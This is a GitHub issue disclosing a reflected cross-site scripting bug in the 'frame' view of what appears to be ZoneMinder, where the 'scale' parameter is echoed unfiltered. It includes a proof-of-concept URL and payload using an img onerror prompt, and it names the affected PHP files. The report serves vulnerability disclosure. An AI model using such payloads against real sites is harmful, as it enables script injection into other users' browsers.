Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Describe Your Environment
Describe the bug The view frame, insecurely prints the scale parameter value on the webpage that is without applying any proper filtration, leading to XSS.
frame
scale
To Reproduce Affected URL : http://localhost/zm/index.php?view=frame&eid=1&fid=1&scale=</script>"><img src=x onerror=prompt('1');>
Payload used - </script>"><img src=x onerror=prompt('1');>
</script>"><img src=x onerror=prompt('1');>
Affected source Files: /web/skins/classic/views/frame.php /web/skins/classic/views/js/frame.js.php
Expected behavior
Debug Logs
None
The text was updated successfully, but these errors were encountered:
b2a97ee
No branches or pull requests
Describe Your Environment
Describe the bug
The view
frame, insecurely prints thescaleparameter value on the webpage that is without applying any proper filtration, leading to XSS.To Reproduce
Affected URL :
http://localhost/zm/index.php?view=frame&eid=1&fid=1&scale=</script>"><img src=x onerror=prompt('1');>
Payload used -
</script>"><img src=x onerror=prompt('1');>Affected source Files:
/web/skins/classic/views/frame.php
/web/skins/classic/views/js/frame.js.php
Expected behavior
Debug Logs
The text was updated successfully, but these errors were encountered: